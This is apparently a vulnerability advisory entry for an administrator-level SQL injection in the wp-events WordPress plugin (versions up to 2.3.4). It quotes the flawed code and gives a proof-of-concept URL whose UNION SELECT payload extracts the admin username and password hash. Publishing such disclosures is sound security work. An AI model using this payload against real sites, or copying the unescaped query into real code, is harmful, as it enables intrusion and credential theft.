Events <= 2.3.4 – Authenticated SQL Injection

Description

Type user access: administrator user.
$_GET[‘edit_event’] is not escaped.

File / Code:

Path Request: /wp-content/plugins/wp-events/wp-events.php

Line : 450 – 468

if ( isset( $_GET['edit_event'] ) ) {
$event_edit_id = esc_attr( $_GET['edit_event'] );
}

...
$edit_event = $wpdb->get_row( "SELECT * FROM `{$wpdb->prefix}events` WHERE `id` = {$event_edit_id}" );

Proof of Concept

target.dev/wp-admin/admin.php?page=wp-events-edit&edit_event=2+UNION+SELECT+1,CONCAT(user_login,char(58),user_pass),3,4,5,6,7,8,9,10,11,12,13,14+FROM+wp_users+WHERE+ID=1

Affects Plugins

wp-events

No known fix

References

URL

https://lenonleite.com.br/en/2017/11/03/wp-events-2-3-4-wordpress-plugin-sql-injetcion/

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Submitter

Lenon Leite

Submitter website

http://lenonleite.com.br/

Submitter twitter

lenonleite

Verified

WPVDB ID

dc2fde63-684b-445b-b3b5-ba0b72814b60

Timeline

Publicly Published

2017-11-03 (about 8 years ago)

Added

2017-11-12 (about 8 years ago)

Last Updated

2019-11-01 (about 6 years ago)

Other

Published

Title

Published

2023-12-21

Title

404 Solution < 2.35.0 - Admin+ SQLi

Published

2024-02-09

Title

Awesome Support – WordPress HelpDesk & Support Plugin < 6.1.8 - Authenticated (Subscriber+) SQL Injection

Published

2025-06-03

Title

MyStyle Custom Product Designer < 3.21.2 - Unauthenticated SQL Injection

Published

2015-03-11

Title

Yoast SEO < 1.7.4 - Blind SQL Injection

Published

2025-08-15

Title

School Management System for Wordpress <= 93.2.0 - Unauthenticated SQL Injection